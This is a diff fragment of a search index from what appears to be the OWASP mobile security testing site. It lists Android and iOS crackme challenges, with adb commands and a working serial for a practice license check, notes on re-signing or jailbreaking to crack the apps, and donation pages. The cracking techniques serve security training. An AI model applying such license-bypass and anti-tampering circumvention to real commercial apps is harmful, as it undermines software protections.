$ adb push validate /data/local/tmp\n[100%] /data/local/tmp/validate\n$ adb shell chmod 755 /data/local/tmp/validate\n$ adb shell /data/local/tmp/validate\nUsage: ./validate <serial>\n$ adb shell /data/local/tmp/validate 1234\nIncorrect serial (wrong format).\n$ adb shell /data/local/tmp/validate JACE6ACIARNAAIIA\nEntering base32_decode\nOutlen = 10\nEntering check_license\nProduct activation passed. Congratulations!\n
SPOILER (Solutions) By Bernhard Mueller
"},{"location":"crackmes/Android/#mastg-hacking-playground","title":"MASTG Hacking Playground","text":"Did you enjoy working with the Crackmes? There is more! Go to the MASTG Hacking Playground and find out!
"},{"location":"crackmes/iOS/","title":"iOS Crackmes","text":""},{"location":"crackmes/iOS/#ios-uncrackable-l1","title":"iOS UnCrackable L1","text":"A secret string is hidden somewhere in this binary. Find a way to extract it. The app will give you a hint when started.
Download
InstallationOpen the \"Device\" window in Xcode and drag the IPA file into the list below \"Installed Apps\".
Note: The IPA is signed with an Enterprise distribution certificate. You'll need to install the provisioning profile and trust the developer to run the app the \"normal\" way. Alternatively, re-sign the app with your own certificate, or run it on a jailbroken device (you'll want to do one of those anyway to crack it).
SPOILER (Solutions)By Bernhard Mueller
"},{"location":"crackmes/iOS/#ios-uncrackable-l2","title":"iOS UnCrackable L2","text":"This app holds a secret inside - and this time it won't be tampered with!
Hint: it is related to alcoholic beverages.
Download
InstallationOpen the \"Device\" window in Xcode and drag the IPA file into the list below \"Installed Apps\".
Note 1: The IPA is signed with an Enterprise distribution certificate. You'll need to install the provisioning profile and trust the developer to run the app the \"normal\" way. Alternatively, re-sign the app with your own certificate, or run it on a jailbroken device (you'll want to do one of those anyway to crack it).
Note 2: Due to its anti-tampering mechanisms the app won't run correctly if the main executable is modified and/or re-signed.
SPOILER (Solutions)By Bernhard Mueller
"},{"location":"donate/how_to_donate/","title":"How to Donate","text":"1. Make your Donation:
Click the button to make your donation directly in the official OWASP website:
Fill in the form and be sure to select the option \"Publicly list me as a supporter of OWASP Mobile Application Security\"
Make your Donation
2. Register your Donation Package (optional):
If your donation is above USD 500 you may opt-in for a Donation Package by registering it. We will then, together with the OWASP Foundation, verify and process it.
Register your Donation
"},{"location":"donate/packages/","title":"Donation Packages","text":"These types of public recognition shall be online no less than one year, or no less than the next major release, whichever is greater.
The Donation Packages have a maximum duration, once expired the logos will be removed and the donator will still be listed as supporter on the project website, GitHub and in the printed and digital versions. This can be renewed anytime.
Good Samaritan (USD 500) Honorable Benefactor (USD 2,000 / 8 Available) God Mode Donator (USD 4,000 / 5 Available)
Please note that the OWASP Donation Policy has changed since 22-Sept-2020. All details can be found in OWASP Donations Policy page.
Contact us if you have any questions regarding your donation.
"}]} \ No newline at end of file diff --git a/sitemap.xml.gz b/sitemap.xml.gz index 182ad93967710393af17bacf29d17311f1ab8a98..e5597c45b1d5a83f5627eaefc2675f31c10c460c 100644 GIT binary patch delta 13 Ucmb=gXP58h;ApsRG?Bdm03C(|SpWb4 delta 13 Ucmb=gXP58h;9zJooXB1Q02u89hX4Qo